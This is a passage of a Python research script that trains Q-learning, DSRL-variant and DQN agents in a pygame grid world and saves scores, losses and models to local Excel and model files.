name="DENSE_2")) model.add(Dense(net_conf["N_actions"], name="DENSE_3")) use_optimizer, optimizer_config = define_optimizer(net_conf["Optimizer"]) model.compile(loss='mse', optimizer=use_optimizer) print(model.summary()) # plot_model(model, to_file='model.png') # d3v.d3viz(model.get_output(), 'test.html') return model, optimizer_config # endregion # ------ RL algorithms (till line 1030) ------ # region DQN - CONFIGURATIONS class ExperienceReplay(object): """ During gameplay all the experiences < s, a, r, s’ > are stored in a replay memory. In training, batches of randomly drawn experiences are used to generate the input and target for training. """ def __init__(self, max_memory=100, discount=.9): """ Setup max_memory: the maximum number of experiences we want to store memory: a list of experiences discount: the discount factor for future experience In the memory the information whether the game ended at the state is stored seperately in a nested array [... [experience, game_over] [experience, game_over] ...] 
""" self.max_memory = max_memory self.memory = list() self.discount = discount def remember(self, states, game_over): # Save a state to memory self.memory.append([states, game_over]) # We don't want to store infinite memories, so if we have too many, we just delete the oldest one if len(self.memory) > self.max_memory: del self.memory[0] # print(">>> states:", states) def get_batch(self, model, batch_size=10): # How many experiences do we have? len_memory = len(self.memory) # Calculate the number of actions that can possibly be taken in the game num_actions = model.output_shape[-1] # Dimensions of the game field env_dim = self.memory[0][0][0].shape[1] # We want to return an input and target vector with inputs from an observed state... inputs = np.zeros((min(len_memory, batch_size), env_dim)) # ...and the target r + gamma * max Q(s’,a’) # Note that our target is a matrix, with possible fields not only for the action taken but also for the other possible actions. # The actions not take the same value as the prediction to not affect them targets = np.zeros((inputs.shape[0], num_actions)) # We draw states to learn from randomly for i, idx in enumerate(np.random.randint(0, len_memory, size=inputs.shape[0])): """ Here we load one transition <s, a, r, s’> from memory state_t: initial state s action_t: action taken a reward_t: reward earned r state_tp1: the state that followed s’ """ state_t, action_t, reward_t, state_tp1 = self.memory[idx][0] # We also need to know whether the game ended at this state game_over = self.memory[idx][1] inputs[i:i + 1] = state_t # First we fill the target values with the predictions of the model. # They will not be affected by training (since the training loss for them is 0) targets[i] = model.predict(state_t)[0] # print("targets\n", targets) # print("action_t", action_t) """ If the game ended, the expected reward Q(s,a) should be the final reward r. 
Otherwise the target value is r + gamma * max Q(s’,a’) """ # Here Q_sa is max_a'Q(s', a') Q_sa = np.max(model.predict(state_tp1)[0]) # if the game ended, the reward is the final reward if game_over: # if game_over is True targets[i, action_t] = reward_t else: # r + gamma * max Q(s’,a’) targets[i, action_t] = reward_t + self.discount * Q_sa return inputs, targets def define_optimizer(s_optimizer): lr = 0 beta_1 = 0 beta_2 = 0 epsilon = 0 decay = 0 rho = 0 if s_optimizer == "adam": lr = 0.001 # 0.001 beta_1 = 0.9 # 0.9 beta_2 = 0.999 # 0.999 epsilon = 1e-08 # 1e-08 decay = 0.0 # 0.0 optimizer_selected = keras.optimizers.Adam(lr=lr, beta_1=beta_1, beta_2=beta_2, epsilon=epsilon, decay=decay) elif s_optimizer == "rms_opt": lr = 0.001 # 0.001 rho = 0.9 # 0.9 epsilon = 1e-08 # e-08 decay = 0.0 # 0.0 optimizer_selected = keras.optimizers.RMSprop(lr=lr, rho=rho, epsilon=epsilon, decay=decay) optimizer_config = [lr, beta_1, beta_2, epsilon, decay, rho] return optimizer_selected, optimizer_config # def choose_action(s_alg, state, agent_pos, model, s_prob,step): # print("\nPREVIOUS MODEL - CHOOSE ACTION\n", model) zero = False if s_alg == "QL": state[agent_pos[1]][agent_pos[0]] = 120 s = str(state) if s not in model.index: indices = [np.array([s, s, s, s]), np.array(['up', 'down', 'right', 'left'])] df_zero = pd.DataFrame(np.zeros([4, 1]), index=indices) model = model.append(df_zero) model = model.fillna(0) n_action = np.argmax(model.loc[s][0]) # Choose the max argument if max(model.loc[s][0]) == 0: zero = True elif s_alg == "DSRL" or s_alg == "DSRL_dist" or s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near" or s_alg == "DSRL_object": a_v_list = [] d = {} obj_list = create_obj_list(state) rel_list = relation_obj_list(obj_list, agent_pos) new_state = rel_list for obj in new_state: # FOR ALL OBJECTS SEEN tp_n_c = str(obj.tp) # GET THE TYPE FROM THE NEW STATE s_n_c = str(obj.loc) # GET THE LOCATION FROM THE NEW STATE if tp_n_c not in model.columns: # print("tp_n_c not in model.columns", tp_n_c) model[tp_n_c] = 0 if s_n_c not in model.index: # print("s_n_c not in model.index", s_n_c) m_index = pd.MultiIndex(levels=[[s_n_c], actions], labels=[[0, 0, 0, 0], [0, 1, 2, 3]], names=['state', 'actions']) df_zero = pd.DataFrame(index=m_index) model = model.append(df_zero) model = model.fillna(0) Qts_a = model[tp_n_c].loc[s_n_c] # print("Qts_a - ", Qts_a) global explore_dict if s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near": # Calculate the distance s_n_c_abs = [int(s) for s in s_n_c if s.isdigit()] # s_n_c_abs = state_new_absolute_distance distance = np.sqrt(s_n_c_abs[0]**2 + s_n_c_abs[1]**2) # print("distance",distance) Qts_a = Qts_a.divide(distance*distance, axis=0) a_v = [] for action, value in Qts_a.items(): pos_x = agent_pos[0] pos_y = agent_pos[1] if action == 'up': pos_y-=1 elif action =="down": pos_y+=1 elif action =="right": pos_x +=1 else: pos_x -=1 if (pos_x, pos_y) in explore_dict: a_v.append((action, value-0.1*explore_dict[(pos_x, pos_y)])) else: a_v.append((action, value)) # a_v = [(value, key) for value, key in Qts_a.items()] # print("Qts_a - NEW", Qts_a) a_v_list.append(a_v) # Append Q-value # print(a_v_list) # Sum the values of all Qs into a single Q for element in a_v_list: for a in element: act = a[0] # Action val = a[1] # Value d[act] = d.get(act, 0) + val # Sum values for each Q # print('a_v_list: (List of the action values for each object in the scene): 
') # print('{0}'.format(a_v_list)) # print('\nd: (The sum of all object`s action values )') # pp.pprint(d) if d != {}: # BE CAREFUL THIS IS A DICT (argmax does not work as usual) inverse = [(value, key) for key, value in d.items()] # CALCULATE ALL KEYS n_action = max(inverse)[1] # Choose the max argument if max(d.values()) == 0: zero = True else: # n_action = "down" n_action = random.choice(actions) elif s_alg == "DQN": state[agent_pos[1]][agent_pos[0]] = 120 state = state.reshape((1, -1)) q = model.predict(state) n_act = np.argmax(q[0]) n_action = actions[n_act] if max(q[0]) == 0: zero = True x = random.random() # E greedy exploration # if x < s_prob: if step < 5 or x < s_prob: n_action = random.choice(actions) print_action = 'Random Act (Prob):' elif zero == True: # n_action = random.choice(actions) print_action = 'NOT Random Act (Zero):' pass else: print_action = 'Chosen Act:' # print("\nNEW MODEL - CHOOSE ACTION\n", model) # explore_set.add(tuple(agent_pos)) return n_action, model, print_action alfa = 1 # Learning Rate gamma = 0.9 # Temporal Discount Factor def learn(s_alg, model, state_t, state_t1, agent_t_pos, agent_t1_pos, reward, action_t, end_game, net_conf, exp_replay): # print("\nPREVIOUS MODEL - LEARN\n", model) batch_loss = 0 if s_alg == "QL": state_t[agent_t_pos[1]][agent_t_pos[0]] = 120 state_t1[agent_t1_pos[1]][agent_t1_pos[0]] = 120 s_t = str(state_t) s_t1 = str(state_t1) if s_t1 not in model.index: indices = [np.array([s_t1, s_t1, s_t1, s_t1]), np.array(['up', 'down', 'right', 'left'])] df_zero = pd.DataFrame(np.zeros([4, 1]), index=indices) model = model.append(df_zero) if s_t not in model.index: indices = [np.array([s_t, s_t, s_t, s_t]), np.array(['up', 'down', 'right', 'left'])] df_zero = pd.DataFrame(np.zeros([4, 1]), index=indices) model = model.append(df_zero) model = model.fillna(0) if end_game == False: max_value = max(model.loc[s_t1][0]) # max(df.loc[new_state][0]) Q_value = model.loc[s_t, action_t][0] updated_model = Q_value + alfa * (reward + (gamma * (max_value)) - Q_value) else: updated_model = reward model.loc[s_t, action_t] = updated_model elif s_alg == "DSRL" or s_alg == "DSRL_dist" or s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near" or s_alg == "DSRL_object": max_value = 0 obj_list = create_obj_list(state_t) rel_list = relation_obj_list(obj_list, agent_t_pos) old_state = rel_list obj_list = create_obj_list(state_t1) rel_list = relation_obj_list(obj_list, agent_t1_pos) new_state = rel_list for i in range(len(old_state)): # Check all items in old state obj_prev = old_state[i] tp_prev = str(obj_prev.tp) s_prev = str(obj_prev.loc) # Check all items in new state obj_new = new_state[i] tp_new = str(obj_new.tp) s_new = str(obj_new.loc) if tp_new not in model.columns: # If type is new, then add type model[tp_new] = 0 if s_new not in model.index: # If state is new, then add state m_index = pd.MultiIndex(levels=[[s_new], actions], labels=[[0, 0, 0, 0], [0, 1, 2, 3]], names=['state', 'actions']) df_zero = pd.DataFrame(index=m_index) model = model.append(df_zero) model = model.fillna(0) max_value = max(model[tp_new].loc[s_new]) if s_alg == "DSRL": # THEY STILL HAVE THE PROBLEM OF NOT PROPAGATING THE NEGATIVE SIGNAL if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DSRL_dist": # THEY STILL HAVE THE PROBLEM OF NOT 
PROPAGATING THE NEGATIVE SIGNAL if reward != 0: s_p_c = [int(s) for s in s_prev if s.isdigit()] if s_p_c[0] < 2 and s_p_c[1] < 2: # EDITIONG DELETE if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward else: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near": # THEY STILL HAVE THE PROBLEM OF NOT PROPAGATING THE NEGATIVE SIGNAL max_value_positive = max(model[tp_new].loc[s_new]) if reward != 0: s_p_c = [int(s) for s in s_prev if s.isdigit()] # s_p_c = state_previous_absolute_distance if s_p_c[0] < 2 and s_p_c[1] < 2: # IF IT IS CLOSE BY, THEN UPDATE ONLY THE CLOSE ONE: if reward < 0 and tp_new == "180": # IF REWARD IS NEGATIVE and NEW OBJECT IS NEGATIVE UPDATE ONLY NEGATIVE TYPE: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif reward > 0 and tp_new == "60": # IF REWARD IS POSITIVE and NEW OBJECT IS POSITIVE UPDATE ONLY POSITIVE TYPE: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward # IF reward is zero else: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] if tp_prev == "180": # IF THE PREVIOUS OBJECT WAS NEGATIVE model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) elif tp_prev == "60": # IF THE PREVIOUS OBJECT WAS POSITIVE model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DSRL_dist_type_near_propNeg": # I try to solve this with max and min, but it did not work very well(THEY STILL HAVE THE PROBLEM OF NOT PROPAGATING THE NEGATIVE SIGNAL) max_value_positive = max(model[tp_new].loc[s_new]) min_value_negative = min(model[tp_new].loc[s_new]) if reward != 0: s_p_c = [int(s) for s in s_prev if s.isdigit()] # s_p_c = state_previous_absolute_distance if s_p_c[0] < 2 and s_p_c[1] < 2: # IF IT IS CLOSE BY, THEN UPDATE ONLY THE CLOSE ONE: if reward < 0 and tp_new == "180": # IF REWARD IS NEGATIVE and NEW OBJECT IS NEGATIVE UPDATE ONLY NEGATIVE TYPE: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * min_value_negative) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif reward > 0 and tp_new == "60": # IF REWARD IS POSITIVE and NEW OBJECT IS POSITIVE UPDATE ONLY POSITIVE TYPE: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward # IF reward is zero else: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] if tp_prev == "180": # IF THE PREVIOUS OBJECT WAS NEGATIVE model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * min_value_negative) - Q_v) elif tp_prev == "60": # IF THE PREVIOUS OBJECT WAS POSITIVE model[tp_prev].loc[s_prev, action_t] = Q_v + alfa 
* (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DSRL_object_near" or s_alg == "DSRL_object": max_value_positive = max(model[tp_new].loc[s_new]) # Find the object that the agent interacted with: # This means that the agents has to know that the object which interacted with # After finding it, he has to assign the value to that object. # This means that I have to find the type and the state of this object that has now x=zero y=zero # print("obj_new.loc[0]\n", obj_new.loc[0]) # print("obj_new.loc[1]\n", obj_new.loc[1]) # print("action_t\n", action_t) # print("s_prev\n", s_prev) if obj_new.loc[0] == 0 and obj_new.loc[1] == 0: tp_to_update = tp_new # print("tp_new\n", tp_new) if action_t == "up": s_prev_to_update = str((0,1)) elif action_t == "down": s_prev_to_update = str((0,-1)) elif action_t == "right": s_prev_to_update = str((-1,0)) elif action_t == "left": s_prev_to_update = str((1,0)) # print("s_prev_to_update\n", s_prev_to_update) if end_game == False: Q_v = model[tp_to_update].loc[s_prev_to_update, action_t] model[tp_to_update].loc[s_prev_to_update, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_to_update].loc[s_prev_to_update, action_t] = reward if reward == 0: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DQN": state_t[agent_t_pos[1]][agent_t_pos[0]] = 120 state_t1[agent_t1_pos[1]][agent_t1_pos[0]] = 120 state_t = state_t.reshape((1, -1)) state_t1 = state_t1.reshape((1, -1)) action_t = actions_dict[action_t] exp_replay.remember([state_t, action_t, reward, state_t1], end_game) # [old_state, old_action, reward, new_state] inputs, targets = exp_replay.get_batch(model, batch_size=net_conf["Batch_size"]) batch_loss = model.train_on_batch(inputs, targets) # print("\nNEW MODEL - LEARN\n", model) return model, batch_loss, exp_replay ''' PROGRAM START ''' __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) def run(s_env, s_alg, s_learn, s_load, s_print, s_auto, s_episode, s_cond_to_end, s_server, s_net_comb_param, s_load_path, s_prob, s_sample, s_save): net_conf = {"N_actions": n_actions, "Max_memory": max_memory_list[s_net_comb_param], "Hidden_size": hidden_size_list[s_net_comb_param], "Batch_size": batch_size_list[s_net_comb_param], "Optimizer": optimizer_list[0]} exp_replay = ExperienceReplay(max_memory=net_conf["Max_memory"]) begin = time.time() begin_time = time.strftime('%X %x') print("\n\n --- BEGINING --- s_sample: %s \n begin_time: %s \n" % (s_sample, begin_time)) df_score = pd.DataFrame() df_percent_list = pd.DataFrame() df_loss_list = pd.DataFrame() df_time_sample = pd.DataFrame() avg_last_score_list = [] if s_server == False: screen = pygame.display.set_mode((400 + 37 * 5, 330 + 37 * 5)) score_list_best = [0] for sample in list(range(1, s_sample+1)): experiment_configurations = (sample, s_env, s_alg, s_episode, s_learn, s_load, s_print, s_auto, s_cond_to_end, s_server, s_net_comb_param, s_prob) print("\n - START - " "\n sample: %s" "\n s_env: %s" "\n s_alg: %s" "\n s_episode: %s" "\n s_learn: %s" "\n s_load: %s" "\n s_print: %s" "\n s_auto: %s" "\n s_cond_to_end: %s" "\n s_server: %s" "\n s_net_comb_param: %s" "\n s_prob: %s" % experiment_configurations) start = time.time() start_time = time.strftime('%X %x') print("\nStart time: ", start_time) negativo_list, 
positivo_list, agent, wall_list, h_max, v_max = environment_conf(s_env) env_dim = [h_max, v_max] # load file for transfer learning if s_load == True: try: model, op_conf = load_model(s_alg, __location__ + s_load_path) except Exception as e: print("DID NOT FIND THE FILE", __location__ + s_load_path, str(e)) else: model, op_conf = create_model(s_alg, env_dim, net_conf) # region INITIALIZE VARIABLES 1 percent_list = [] score = 0 score_list = [] episodes = 0 episodes_list = [] steps = 0 steps_list = [] batch_loss = 0 loss_list = [] # endregion # main component to an episode while (episodes < s_episode): # max_episodes negativo_list, positivo_list, agent, wall_list, h_max, v_max = environment_conf(s_env) # region INITIALIZE VARIABLES 2 episodes += 1 episodes_list.append(episodes) max_steps = 100 steps_list.append(steps) steps = 0 act_list = [] last_move = False action_chosen = "" encountered = 0 pos_collected = 0 prob = s_prob # endregion if s_server == False: # region DRAW SCREEN screen.fill(white) show_Alg(s_alg, screen) show_Samples(sample, screen) show_Level(episodes, screen) show_Score(score, screen) show_Steps(steps, screen) show_Percent(percent_list[-10:], screen) show_Steps_list(steps_list[-30:], screen) show_Act_List(act_list[-20:], screen) show_Action(action_chosen, screen) show_Env(s_env, screen) draw_objects(agent, positivo_list, negativo_list, wall_list, screen) pygame.display.flip() # endregion # main reinforcement learning part while (True): # max_steps or condition to finish sleep(speed) ''' EVENT HANDLE ''' key_pressed = False set_action = False while (s_server == False): for event in pygame.event.get(): # QUIT GAME if event.type == pygame.QUIT: pygame.quit() sys.exit() # ADD OR DELETE WALL if event.type == pygame.MOUSEBUTTONDOWN: pass # if (pygame.mouse.get_pressed() == (1, 0, 0)): # LEFT BUTTON (add wall) # pos = pygame.mouse.get_pos() # x = (pos[0] - x_g) / (m + w) # y = (pos[1] - y_g) / (m + h) # x = math.trunc(x) # y = math.trunc(y) # w_has = False # for item in wall_list: # if math.trunc((item[0] - x_g) / (m + w)) == x and math.trunc( # (item[1] - y_g) / (m + h)) == y: # w_has = True # if w_has == False: # wall = Class.Wall('wall', x, y) # print('wall ', wall, 'added') # wall_list.append(wall) # if (pygame.mouse.get_pressed() == (0, 0, 1)): # RIGHTBUTTON (delete wall) # pos = pygame.mouse.get_pos() # x = (pos[0] - x_g) / (m + w) # y = (pos[1] - y_g) / (m + h) # x = math.trunc(x) # y = math.trunc(y) # wall = Class.Wall('wall', x, y) # for i in wall_list: # if i == wall: # wall_list.remove(wall) # print('wall ', wall, 'removed') # EVENT - ANY PRESSED KEY # PRESS A KEY if event.type == pygame.KEYDOWN: # SAVE AND QUIT - KEY P if event.key == pygame.K_p: pygame.quit() sys.exit() # PLOT AGENT`S PERFORMENCE - KEY G if event.key == pygame.K_g: plt.plot(score_list) plt.ylabel('Score') plt.xlabel('Total Steps') plt.title('Performance of the Agent') plt.show() plt.plot(percent_list) plt.ylabel('Percentage of objects +') plt.xlabel('Total Steps') plt.title('Episode over 100 times step each') plt.show() if s_alg == "DQN": plt.plot(loss_list) plt.ylabel('loss') plt.xlabel('Total Steps') plt.title('batch_loss') plt.show() # MOVE - SPACE BAR if event.key == pygame.K_SPACE: key_pressed = True break # MOVE - ARROW KEYS if event.key in p_keys: key_pressed = True set_action = True if event.key == pygame.K_w: # North # add_act('↑') ⇦ ⇨ ⇧ ⇩ key_action = "up" if event.key == pygame.K_s: # South # add_act('↓') ⬅ ➡ ⬆ ⬇ key_action = "down" if event.key == pygame.K_d: # West # add_act('→') 
key_action = "right" if event.key == pygame.K_a: # East # add_act('←') key_action = "left" break # Run game if key is preseed or automatic is selected if key_pressed or s_auto: break # BREAK IF IT WAS THE LAST MOVE if last_move == True: break # RUN_GAME steps += 1 ''' OLD STATE - S 1 - 1''' state_t = update_state(h_max, v_max, agent, positivo_list, negativo_list, wall_list) agent_t = agent.pos ''' CHOOSE ACTION - AGENT ACT - 2''' action_chosen, model, print_action = choose_action(s_alg, state_t, agent_t, model, prob,steps) if set_action: action_chosen = key_action ''' CHANGE THE WORLD - UP_ENV - 3''' agent.try_move(action_chosen, wall_list) act_list.append(action_chosen) # if s_print: print(print_action, action_chosen) ''' NEW STATE - S2 - 4''' state_t1 = update_state(h_max, v_max, agent, positivo_list, negativo_list, wall_list) agent_t1 = agent.pos global explore_set global explore_dict if s_print: # print('\n>>>> Level: ' + str(episodes) + ' | Step: ' + str( # steps) + ' | New_agent_pos: ' + str(agent.pos) + ' <<<<') pos_tuple = tuple(agent.pos) explore_set.add(pos_tuple) if pos_tuple not in explore_dict: explore_dict[pos_tuple] = 1 else: explore_dict[pos_tuple] += 1 if steps==max_steps: print("Number of explore node: "+str(len(explore_set))) print("Explored Node postion: "+str(explore_dict)) explore_set = set() explore_dict = dict() ''' GET REWARD - 5 ''' # region GET REWARD AND DELETE COLLECTED OBJECT prev_score = score score += step_reward for positivo in positivo_list: if agent.pos == positivo.pos: encountered += 1 pos_collected += 1 score += positive_reward positivo = Class.Positivo('positivo', agent.pos[0], agent.pos[1]) positivo_list.remove(positivo) # if s_print == True and s_server == False: # print(' Hit the Positivo') for negativo in negativo_list: if agent.pos == negativo.pos: encountered += 1 score -= negative_reward negativo = Class.Negativo('negativo', agent.pos[0], agent.pos[1]) negativo_list.remove(negativo) # if s_print == True and s_server == False: # print(' Hit the Negativo') new_score = score score_list.append(score) reward = new_score - prev_score # endregion ''' LEARN - 6 ''' # CONDITION TO FINISH THE Episode if s_cond_to_end == 'max_steps': if steps == max_steps: last_move = True elif s_cond_to_end == 'coll_all' or steps > max_steps: if len(positivo_list) == 0 and len(negativo_list) == 0 or steps > max_steps: last_move = True elif s_cond_to_end == 'only_positive' or steps > max_steps: if len(positivo_list) == 0 or steps > max_steps: last_move = True elif s_cond_to_end == 'only_negative' or steps > max_steps: if len(negativo_list) == 0 or steps > max_steps: last_move = True # LEARN if s_learn == True: action_t = action_chosen if last_move == False: ''' LEARN ''' model, batch_loss, exp_replay = learn(s_alg, model, state_t, state_t1, agent_t, agent_t1, reward, action_t, False, net_conf, exp_replay) else: ''' LEARN FINAL ''' model, batch_loss, exp_replay = learn(s_alg, model, state_t, state_t1, agent_t, agent_t1, reward, action_t, True, net_conf, exp_replay) if s_server == False: # region DRAW SCREEN screen.fill(white) show_Alg(s_alg, screen) show_Samples(sample, screen) show_Level(episodes, screen) show_Score(score, screen) show_Steps(steps, screen) show_Percent(percent_list[-10:], screen) show_Steps_list(steps_list[-30:], screen) show_Act_List(act_list[-20:], screen) show_Action(action_chosen, screen) show_Env(s_env, screen) draw_objects(agent, positivo_list, negativo_list, wall_list, screen) pygame.display.flip() # endregion try: percent = pos_collected / 
encountered except ZeroDivisionError: percent = 0 percent_list.append(percent) loss_list.append(batch_loss) print("Episode: ", episodes) # region TIME 1 print("Start time: ", start_time) end = time.time() end_time = time.strftime('%X %x') print("End time: ", end_time) time_elapsed = end - start print("Time elapsed: ", time_elapsed) # endregion '''GET THE BEST MODEL''' if max(score_list) > max(score_list_best): best_model = model score_list_best = score_list # region MAKE LIST OF THE RESULTS avg_last_score_list.append(score_list[-1]) score_list_df = pd.DataFrame({'Score': score_list}) percent_list_df = pd.DataFrame({'Percent': percent_list}) loss_list_df = pd.DataFrame({'Batch_loss': loss_list}) time_sample_df = pd.DataFrame({'Time': [time_elapsed]}) df_score = pd.concat([df_score, score_list_df], ignore_index=True, axis=1) df_percent_list = pd.concat([df_percent_list, percent_list_df], ignore_index=True, axis=1) df_loss_list = pd.concat([df_loss_list, loss_list_df], ignore_index=True, axis=1) df_time_sample = pd.concat([df_time_sample, time_sample_df], ignore_index=True, axis=1) # endregion if s_save == True: # region PATH TO SAVE save_path_core = __location__ + "/Results/" if s_learn == True: save_path = save_path_core + "Train/Env_" + str(s_env) + "/Train_Env_" + str(s_env) + "_" + s_alg else: save_path = save_path_core + "Test/Env_" + str(s_env) + "/Test_Env_" + str(s_env) + "_" + s_alg if s_alg == "DQN": save_path += "_" + str(s_net_comb_param) # convert begin_time to string and format it time_path = begin_time.replace(" ", " ") time_path = time_path.replace(":", " ") time_path = time_path.replace("/", "-") # append to the save path save_path = save_path + " " + time_path if s_load == True: load_path = " loaded_with " + s_load_path.replace("/", "_") save_path = save_path + load_path # If it doesnt find the path, then create a new path if not os.path.exists(os.path.dirname(save_path)): try: os.makedirs(os.path.dirname(save_path)) except OSError as exc: # Guard against race condition print("ERROR when saving the File") # endregion print("save_path: ", save_path) # region SAVE ALL # IF IT IS NOT DQN NULL NET CONF. 
VALUES if s_alg != "DQN": op_conf = [0, 0, 0, 0, 0, 0] net_conf = {"N_actions":0, "Max_memory":0, "Hidden_size":0, "Batch_size":0, "Optimizer":"none"} avg_last_score = np.average(avg_last_score_list) config_list = pd.concat([pd.Series({'Run_Conf': "A"}), pd.Series({'Env_conf': s_env}), pd.Series({'Algort': s_alg}), pd.Series({'Learn': s_learn}), pd.Series({'Load': s_load}), pd.Series({'Samples': s_sample}), pd.Series({'Episode': s_episode}), pd.Series({'Max_steps': max_steps}), pd.Series({'s_cond_to_end': s_cond_to_end}), pd.Series({'Auto': s_auto}), pd.Series({'Server': s_server}), pd.Series({'Print': s_print}), pd.Series({'MODEL CONF': ""}), pd.Series({'alfa': alfa}), pd.Series({'gamma': gamma}), pd.Series({'Prob': Prob}), pd.Series({'N_actions': net_conf["N_actions"]}), pd.Series({'Max_memory': net_conf["Max_memory"]}), pd.Series({'Hidden_size': net_conf["Hidden_size"]}), pd.Series({'Batch_size': net_conf["Batch_size"]}), pd.Series({'Optimizer': net_conf["Optimizer"]}), pd.Series({'lr': op_conf[0]}), pd.Series({'beta_1': op_conf[1]}), pd.Series({'beta_2': op_conf[2]}), pd.Series({'epsilon': op_conf[3]}), pd.Series({'decay': op_conf[4]}), pd.Series({'rho': op_conf[5]}), pd.Series({'': ""}), pd.Series({'AVG SCORE': avg_last_score})]) config_list = config_list.to_frame() if s_print: print("\nconfig_list:\n", config_list) # Create a Pandas Excel writer using XlsxWriter as the engine. writer = pd.ExcelWriter(save_path + ".xlsx", engine='xlsxwriter') # SAVING CONFIG: config_list.to_excel(writer, sheet_name='Run_Conf', header=False) worksheet = writer.sheets['Run_Conf'] worksheet.set_column('A:B', 15) # SAVING SCORE: df_score_mean = df_score.mean(axis=1) df_score.insert(0, "Avg " + str(s_sample), df_score_mean) df_score.to_excel(writer, sheet_name='Score') worksheet = writer.sheets['Score'] worksheet.write(0, 0, "Score") # SAVING PERCENT: df_percent_list_mean = df_percent_list.mean(axis=1) df_percent_list.insert(0, "Avg " + str(s_sample), df_percent_list_mean) df_percent_list.to_excel(writer, sheet_name='Percent') worksheet = writer.sheets['Percent'] worksheet.write(0, 0, "Percent") # SAVING LOSS: df_loss_list.to_excel(writer, sheet_name='Loss') worksheet = writer.sheets['Loss'] worksheet.write(0, 0, "Loss") # SAVING TIME: df_time_sample.to_excel(writer, sheet_name='Time') worksheet = writer.sheets['Time'] worksheet.write(0, 0, "Time") # region CELL SIZE # worksheet = writer.sheets['Score'] # worksheet.set_column('A:B', 15) # worksheet = writer.sheets['Time'] # worksheet.set_column('A:B', 15) # endregion # SAVING BEST MODEL (out of # Samples): if s_alg == "DSRL" or s_alg == "QL" or s_alg == "DSRL_dist" or s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near" or s_alg == "DSRL_object": # SAVING MODEL CONFIGURATIONS: best_model.to_excel(writer, sheet_name='model') # CONDITIONAL COLOR worksheet = writer.sheets['model'] for x in range(2, 700, 4): cell = "C" + str(x) + ":D" + str(x + 3) worksheet.conditional_format(cell, {'type': '3_color_scale'}) # CELL SIZE worksheet = writer.sheets['model'] worksheet.set_column('A:A', 50) # region ADD PLOTS # worksheet = writer.sheets['results'] # workbook = writer.book # chart = workbook.add_chart({'type': 'line'}) # chart2 = workbook.add_chart({'type': 'line'}) # chart.add_series({'values': '=results!$B$2:$B$100'}) # chart2.add_series({'values': '=results!$C$2:$C$10'}) # worksheet.insert_chart('F3', chart) # worksheet.insert_chart('N3', chart2) # SAVE DQN MODEL if s_learn == True 
and s_alg == "DQN": save_model(best_model, save_path) writer.save() # endregion print("\n - END - " "\n sample: %s" "\n s_env: %s" "\n s_alg: %s" "\n s_episode: %s" "\n s_learn: %s" "\n s_load: %s" "\n s_print: %s" "\n s_auto: %s" "\n s_cond_to_end: %s" "\n s_server: %s" "\n s_net_comb_param: %s" "\n s_prob: %s" % experiment_configurations) # region TIME 2 print("\n\nBegin time: ", begin_time) finish = time.time() finish_time = time.strftime('%X %x') print("Final time: ", finish_time) total_time = finish - begin print("Total time: ", total_time) # endregion return # -------------------------------------------------------------------------------------------------- # ''' SELECT PARAMETERS TO RUN THE SOFTWARE ''' # environment configuration Env = 11 Alg_list = ["QL", "DSRL", "DSRL_object_near", "DQN", "DSRL_dist", "DSRL_dist_type", "DSRL_dist_type_near", "DSRL_dist_type_near_propNeg", "DSRL_object"] Alg = Alg_list[2] # Select the algorithm to be used Learn = False # To update its knowledge Load = True # To load a learned model Load_path = "/Results/Train/Env_11/Train_Env_11_DSRL 02 41 20 05-05-21" # algorithm configuration Samples = 2 # Usually 10 samples (repeat 100 episodes for 10 times) Print = True # Print some info in the terminal Auto = True # Agent moves Automatic or if False it moves by pressing the Spacebar key Server = False # If running in the server since # change Prob to 1 for probe training?? Prob = 0.3 # Probability to make a random move (exploration rate) Cond_to_end = "max_steps" # Choose from below 